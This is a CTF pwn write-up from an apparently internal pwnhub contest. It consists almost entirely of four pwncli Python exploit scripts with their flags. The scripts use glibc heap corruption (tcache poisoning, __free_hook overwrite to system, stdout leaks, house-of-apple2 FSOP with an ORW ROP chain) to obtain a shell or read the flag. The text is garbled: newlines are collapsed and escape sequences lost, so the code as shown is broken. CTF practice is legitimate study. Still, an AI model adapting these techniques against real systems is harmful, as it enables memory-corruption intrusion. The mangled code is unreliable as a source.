【pwn专场】pwnhub内部赛writeup

#!/usr/bin/env python3# Link: https://github.com/RoderickChan/pwncli# Usage:#     Debug : python3 exp.py debug elf-file-path -t -b malloc#     Remote: python3 exp.py remote elf-file-path ip:port
# flag{love-life-love-freedom-d23s}
from pwncli import *cli_script()
io: tube = gift.ioelf: ELF = gift.elflibc: ELF = gift.libc
# one_gadgets: list = get_current_one_gadget_from_libc(more=False)# CurrentGadgets.set_find_area(find_in_elf=True, find_in_libc=False, do_initial=False)
"""0: status8: filename
------------
ls file:    status == 1: print
cat file:    status == 1: puts filecontent
touch file:    status == 0:         status = 1        filecontent = malloc(0x208)        strcpy(filename, xxx)        read()    
cp file1 file2:    file1 == file[0].filename:        fine file2:            strncpy(file2, file[0], 0x208)                else:            find files[n].status == 0            files[n].status = 1            files[n].filename = file2            strncpy(file2, file[0], 0x208)
gedit file:    find filename    file.status == 1:        read(filecontent, 0x200)
rm file:    free(files[n])    files[n] = 0
ln target linkname:    find file:        find status==0:            strcpy(filename, linkname)            status = 1            linkname = target.content
"""
def cmd(i):    sla(">>>>", i)
def touch(filename, data="deadbeef", sendline=True):    cmd(f'touch {filename}')    print(" ")    s(data)    if sendline:        s("n")        def gedit(filename, data, sendline=True):    cmd(f'gedit {filename}')    print(" ")    s(data)    if sendline:        s("n")
def cat(filename):    cmd(f'cat {filename}')
def rm(filename):    cmd(f'rm {filename}')
def ln(target, linkname):    cmd(f'ln {target} {linkname}')
for i in range(8):    touch(f"file{i}")
ln("file0", "link0")
for i in range(7):    rm(f"file{i+1}")
rm("file0")
cat("link0")
main_arena_addr = recv_current_libc_addr() - 96leak("main_arena_addr", main_arena_addr)S()lb = set_current_libc_base_and_log(main_arena_addr, 0x1ebb80)
for i in range(8):    touch(f"file{i}")    rm("file6")rm("file7")gedit("link0", p64(libc.sym.__free_hook-8))S()touch(f"file8")touch(f"file9", flat("/bin/shx00", libc.sym.system))rm("file9")
ia()

#!/usr/bin/env python3# Link: https://github.com/RoderickChan/pwncli# Usage:#     Debug : python3 exp.py debug elf-file-path -t -b malloc#     Remote: python3 exp.py remote elf-file-path ip:port# flag{12awxvpjsd-21aqxw-a3daxdlpsd-987@376hnb}from pwncli import *cli_script()set_remote_libc('libc-2.31.so')
io: tube = gift.ioelf: ELF = gift.elflibc: ELF = gift.libc
def cmd(i):    sla("is:", i)
def add(i, sz, data="deadbeef", sendline=True):    cmd('1')    sla("index:n", str(i))    sla("size:n", str(sz))    if sendline:        sla("content:n", data)    else:        sa("content:n", data)
def dele(i):    cmd('2')    sla("index?n", str(i))
def edit(i, data, sendline=True):    cmd('3')    sla("index?n", str(i))    if sendline:        sla("content:n", data)    else:        sa("new content:n", data)

add(0, 0x51, flat({0x40: [0, 0x71]}))add(1, 0x50)add(2, 0x50)
for i in range(9):    add(i+3, 0x70)
# add(12, 0x50)
dele(0)dele(2)S(0)edit(-0x3e, "xf0")
for i in range(7):    dele(9 - i)
S(0)add(3, 0x50)add(4, 0x50, flat(0, 0x441))S(0)dele(1)S(0)
add(0, 0x50)add(1, 0x50)
if gift.remote:    off = 0x46a0else:    off = (gift._libc_base + libc.sym._IO_2_1_stdout_) & 0xffffS()edit(-0x3c, p16(off))S()add(5, 0x70)S()add(6, 0x70, flat(0xfbad1887, 0, 0, 0, "x00"))
libcaddr = recv_current_libc_addr()leak("libcaddr", libcaddr)
set_current_libc_base_and_log(libcaddr, 0x1eb980)dele(1)dele(0)dele(4)
add(0, 0x60, flat(0, 0x61, libc.sym.__free_hook-8))add(1, 0x50)add(4, 0x50, flat("/bin/shx00", libc.sym.system))dele(4)
ia()

#!/usr/bin/env python3# Link: https://github.com/RoderickChan/pwncli# Usage:#     Debug : python3 exp.py debug elf-file-path -t -b malloc#     Remote: python3 exp.py remote elf-file-path ip:port# flag{1sddeasd-2axxxedw-a3dd23fdasd-a346gasdw}
from pwncli import *cli_script()set_remote_libc('libc-2.31.so')
io: tube = gift.ioelf: ELF = gift.elflibc: ELF = gift.libc
# one_gadgets: list = get_current_one_gadget_from_libc(more=False)CurrentGadgets.set_find_area(find_in_elf=0, find_in_libc=1, do_initial=False)
def cmd(i):    sla("is:", i)
def add(i, sz): # 0x200-0x800    cmd('1')    sla("index?n", str(i))    sla("size?n", str(sz))
def add2(i, sz): # 0x200-0x800    cmd('5')    sla("index?n", str(i))    sla("size?n", str(sz))
def edit(i, data, sendline=True):    cmd('3')    sla("Which one?n", str(i))    if sendline:        sla("new content?n", data)    else:        sa("new content?n", data)
def show(i):     cmd('4')    sla("Which one?n", str(i))

def dele(i):    cmd('2')    sla("Which one?n", str(i))
add(2, 0x420)add(0, 0x200)add(1, 0x200)add(7, 0x800)dele(7)add(8, 0x200)add(3, 0x410)add(4, 0x200)
dele(0)dele(1)show(1)
heapaddr = u64_ex(rn(6))leak("heapaddr", heapaddr)
dele(2)show(2)libcaddr = u64_ex(rn(6))leak("libcaddr", libcaddr)
lb = set_current_libc_base_and_log(libcaddr, 0x1ebbe0)add(5, 0x600)
edit(2, flat(lb + 0x1ebfd0, 0, libc.sym._IO_list_all-0x20)[1:])
dele(3)add(6, 0x600)
fff = IO_FILE_plus_struct()
payload = fff.house_of_apple2_stack_pivoting_when_do_IO_operation(standard_FILE_addr=heapaddr+0x620,                                                    _IO_wfile_jumps_addr=libc.sym._IO_wfile_jumps,                                                    leave_ret_addr=CurrentGadgets.leave_ret(),                                                    pop_rbp_addr=CurrentGadgets.pop_rbp_ret(),                                                    fake_rbp_addr=heapaddr+0x430+0x8                                                    )
edit(7, flat({0x200-9: payload, 0x7:[    "flag.txt".ljust(0x10, "x00"),    CurrentGadgets.orw_chain(heapaddr+0x430, heapaddr)]}, filler="x00"))
edit(4, "x00")
cmd('3') # exit 0
ia()

#!/usr/bin/env python3# Link: https://github.com/RoderickChan/pwncli# Usage:#     Debug : python3 exp.py debug elf-file-path -t -b malloc#     Remote: python3 exp.py remote elf-file-path ip:port# flag{12sd22222s-213edw-a3aaazcd-ad213dasd2sdw}
from pwncli import *cli_script()set_remote_libc('libc-2.27.so')
io: tube = gift.ioelf: ELF = gift.elflibc: ELF = gift.libc
# one_gadgets: list = get_current_one_gadget_from_libc(more=False)# CurrentGadgets.set_find_area(find_in_elf=True, find_in_libc=False, do_initial=False)
def cmd(i):    sla("chs:", i)
def add(i, sz, data="deadbeef"):    cmd('1')    sla("index?n", str(i))    sla("size:n", str(sz))    sleep(0.1)    s(data)
def dele(i):    cmd('2')    sla("index?n", str(i))
def edit(i, data):    cmd('3')    sla("index?n", str(i))    sa("content:", data)

sa("what is your name?n", "roderick"*2)sla("age?n", str(18))sla("high?n", str(18))
stackleak = recv_current_libc_addr()leak("stack address", stackleak)
# 1. 记录你现在掌握的信息，漏洞、读写能力；你发现无法进行下一步利用，大概率你还有漏洞没找到# 2. 写下你的利用过程,从读到写
# 通过栈，分配到stdout
# array size: 4add(0, 0x18)add(1, 0x28)add(2, 0x78, flat(0, 0, 0, 0x21))add(3, 0x78) # tcache_count
edit(0, flat({0x18: "x51"}))dele(1)dele(3)dele(2)add(1, 0x40, flat({0x20: [0, 0x31, stackleak-0x28b8]}))S(0)add(2, 0x78)add(3, 0x78)S(0)dele(0)add(0, 0x78, flat(0xfbad1887, 0, 0, 0, "x00"))libcaddr = recv_current_libc_addr()leak("libcaddr", libcaddr)lb = set_current_libc_base_and_log(libcaddr, 0x3ed8b0)S(0)
edit(0, flat(0xfbad1887, 0,              0, 0,              libc.sym._IO_2_1_stdout_+131, libc.sym._IO_2_1_stdout_+131,              libc.sym._IO_2_1_stdout_+131, libc.sym._IO_2_1_stdout_+131,             libc.sym._IO_2_1_stdout_+131+1, 0, 0, 0, 0, 0, 2, "n"))
leakaddr = stackleak+0x20
# tcache->key = 0edit(0, flat(0xfbad1887, leakaddr,              leakaddr, leakaddr,              leakaddr, leakaddr+8,              leakaddr+8, leakaddr,             libc.sym._IO_2_1_stdout_+131+8, 0, 0, 0, 0, 0, 2, "n"))
codeaddr =  u64(rn(8))leak("codeaddr", codeaddr)codebase = codeaddr-0x1080
dele(2)edit(1, flat({0x30: codebase+0x202080}) + b"n")dele(1)add(1, 0x20)add(2, 0x20, p64(libc.sym.__free_hook-8))edit(0, flat("/bin/shx00", libc.sym.system, "n"))dele(0)
sl("cat flag* >&2")
ia()